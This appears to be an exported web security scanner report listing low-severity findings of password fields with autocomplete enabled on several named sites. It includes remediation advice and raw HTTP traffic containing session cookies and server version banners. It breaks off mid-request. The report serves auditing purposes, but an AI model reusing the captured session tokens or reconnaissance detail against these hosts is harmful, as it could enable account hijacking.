http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-clients-downloads-3-41-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-e-mail-list-management-downloads-3-42-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-fax-tools-downloads-3-43-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-newsgroup-clients-downloads-3-44-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-comms-tools-downloads-3-48-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-other-e-mail-tools-downloads-3-49-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-pager-tools-downloads-3-45-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-telephony-downloads-3-46-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-communications-web-video-cams-downloads-3-47-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-desktop-downloads-4-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-development-downloads-5-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-education-downloads-6-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-games-entertainment-downloads-7-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-graphic-apps-downloads-8-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-home-hobby-downloads-9-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-multimedia-design-downloads-258-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-network-internet-downloads-10-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-security-privacy-downloads-11-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-servers-downloads-12-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-system-utilities-downloads-13-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-web-development-downloads-14-0-d.html
http://www.x64bitdownload.com/categories/free-64-bit-widgets-downloads-304-0-d.html
http://www.x64bitdownload.com/contact.html
http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html
http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html
http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html
http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html
http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html
http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html
http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html
http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html
http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html
http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html
http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html
http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html
http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22
http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html
http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html
http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html
http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html
http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html
http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html
http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html
http://www.x64bitdownload.com/downloads/t-64-bit-usenext-download-rizftkeg.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-ivzgszuq.html
http://www.x64bitdownload.com/downloads/t-64-bit-web-forum-reader-download-sqifmyiy.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-mail-download-melibvyx.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2009-download-exrxqhff.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-live-messenger-2011-download-rcmfqzer.html
http://www.x64bitdownload.com/downloads/t-64-bit-windows-vista-service-pack-1-standalone-for-x64-download-jvbvrxvs.html
http://www.x64bitdownload.com/downloads/t-64-bit-yahoo-messenger-download-kgzterdi.html
http://www.x64bitdownload.com/drivers/
http://www.x64bitdownload.com/drivers/64-bit-vista-drivers.html
http://www.x64bitdownload.com/featured-software.html
http://www.x64bitdownload.com/linktous.html
http://www.x64bitdownload.com/new-reviews.html
http://www.x64bitdownload.com/new-software.html
http://www.x64bitdownload.com/saved-software.html
http://www.x64bitdownload.com/saved-software.html
http://www.x64bitdownload.com/software-advanced.html
http://www.x64bitdownload.com/submit-pad-file.html
http://www.x64bitdownload.com/tellafriend.html
http://www.x64bitdownload.com/top-software-downloads.html

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

15.1. https://acc.newsguy.com/cgi-bin/login_frm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/cgi-bin/login_frm

Issue detail

The page contains a form with the following action URL:

https://acc.newsguy.com/cgi-bin/login_prx

The form contains the following password field with autocomplete enabled:

pass

Request

GET /cgi-bin/login_frm HTTP/1.1
Host: acc.newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=BGcaQVM6SsMq0HMk6SquKem4opp0oWW0L4d3d923f;

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:52:59 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Connection: close
Content-Type: text/html

<html>

<head>
<title>Newsguy - Login to Newsguy</title>
<meta NAME="description" CONTENT="Access to Usenet Newsgroups, Email accounts, Web space,
Software, Archives, Art & Music Galleries, Feature co
...[SNIP]...
<form method="POST" name="FrontPage_Form1" action="/cgi-bin/login_prx" onsubmit="return FrontPage_Form1_Validator(this)">
<div align="center">
...[SNIP]...
<input type="password" size="12" name="pass"></font>
...[SNIP]...

15.2. https://acc.newsguy.com/user/accnt_settings previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://acc.newsguy.com
Path:	/user/accnt_settings

Issue detail

The page contains a form with the following action URL:

https://acc.newsguy.com/user/accnt_edit_usenet?1+86945

The form contains the following password fields with autocomplete enabled:

pass1
pass2

Request

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 15:01:37 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
WWW-Authenticate: Basic realm="NEWSGUY"
Set-Cookie: DIGEST=C378.xjGh8DpywVURU2nsemaopp0oWW0L4d3d9451; path=/; domain=.newsguy.com;
Connection: close
Content-Type: text/html

<HTML><HEAD>
<TITLE>Newsguy - Account Administration - Account Settings</TITLE>
<script src="/accnt_forms.js"></script>
<script language="JavaScript">
<!-- calculate available quotas by values type in
...[SNIP]...
<tr>
<form action="accnt_edit_usenet?1+86945" method=post>
<td bgcolor="#5273A5" width="525" height="18">
...[SNIP]...
<td width="133" height="25">
<input type="password" name="pass1" size="10"></td>
...[SNIP]...
<td width="140" height="25">
<input type="password" name="pass2" size="10"></td>
...[SNIP]...

15.3. https://billing.cloudaccess.net/cart.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/cart.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

15.4. https://billing.cloudaccess.net/clientarea.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/clientarea.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /clientarea.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5693
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.5. https://billing.cloudaccess.net/clientarea.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/clientarea.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/jwhmcs.php?goto=clientarea&task=ulogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5693
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
</p>
<form action="jwhmcs.php?goto=clientarea&task=ulogin" method="post" name="frmlogin" id="frmlogin">
<table style="margin: 0 auto;" cellpadding="0" cellspacing="0" border="0" align="center" class="frame">
...[SNIP]...
<td><input type="password" name="password" size="25" value="" /></td>
...[SNIP]...

15.6. https://billing.cloudaccess.net/domainchecker.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/domainchecker.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /domainchecker.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:12 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8492

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.7. https://billing.cloudaccess.net/knowledgebase.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase.php HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:23 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.8. https://billing.cloudaccess.net/knowledgebase/10/Managing-your-account previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/10/Managing-your-account

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/10/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/10/Managing-your-account HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:26 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 7344
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.9. https://billing.cloudaccess.net/knowledgebase/12/Cloud-Control-Panel previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/12/Cloud-Control-Panel

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/12/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/12/Cloud-Control-Panel HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 6866
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.10. https://billing.cloudaccess.net/knowledgebase/13/Images previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/13/Images

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/13/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/13/Images HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:57 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5709
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.11. https://billing.cloudaccess.net/knowledgebase/14/Article-Manager previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/14/Article-Manager

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/14/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/14/Article-Manager HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:51 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10089

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.12. https://billing.cloudaccess.net/knowledgebase/15/Support previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/15/Support

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/15/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/15/Support HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:30 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5648
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.13. https://billing.cloudaccess.net/knowledgebase/28/How-to-change-your-domain-name.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/28/How-to-change-your-domain-name.html

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/28/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/28/How-to-change-your-domain-name.html HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:09 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 8379

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.14. https://billing.cloudaccess.net/knowledgebase/38/How-to-upgrade-your-demo-site.html previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/knowledgebase/38/How-to-upgrade-your-demo-site.html

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/knowledgebase/38/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /knowledgebase/38/How-to-upgrade-your-demo-site.html HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:56:24 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 12353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.15. https://billing.cloudaccess.net/submitticket.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/submitticket.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/dologin.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /submitticket.php?step=2&deptid=14 HTTP/1.1
Host: billing.cloudaccess.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=173001969.1295877160.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=nlahukcb6v56uitl53v0m81g20; __utma=173001969.1244189596.1295877160.1295877160.1295877160.1; __utmc=173001969; __utmb=173001969.4.10.1295877160;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<div class="inModule">
    <form method="post" action="dologin.php" id="loginSideModule">
    <h3 class="header">
...[SNIP]...
</label>
    <input name="password" type="password" size="25" id="passwordLogin" />

       <p>
...[SNIP]...

15.16. https://billing.cloudaccess.net/submitticket.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://billing.cloudaccess.net
Path:	/submitticket.php

Issue detail

The page contains a form with the following action URL:

https://billing.cloudaccess.net/jwhmcs.php?goto=submitticket&task=ulogin

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 13:57:33 GMT
Server: Apache/2.2.17 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5699
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
</p>
<form action="jwhmcs.php?goto=submitticket&task=ulogin" method="post" name="frmlogin" id="frmlogin">
<table style="margin: 0 auto;" cellpadding="0" cellspacing="0" border="0" align="center" class="frame">
...[SNIP]...
<td><input type="password" name="password" size="25" value="" /></td>
...[SNIP]...

15.17. https://bugzilla.mozilla.org/show_bug.cgi previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://bugzilla.mozilla.org
Path:	/show_bug.cgi

Issue detail

The page contains a form with the following action URL:

https://bugzilla.mozilla.org/show_bug.cgi?id=378962

The form contains the following password field with autocomplete enabled:

Bugzilla_password

Request

GET /show_bug.cgi?id=378962 HTTP/1.1
Host: bugzilla.mozilla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
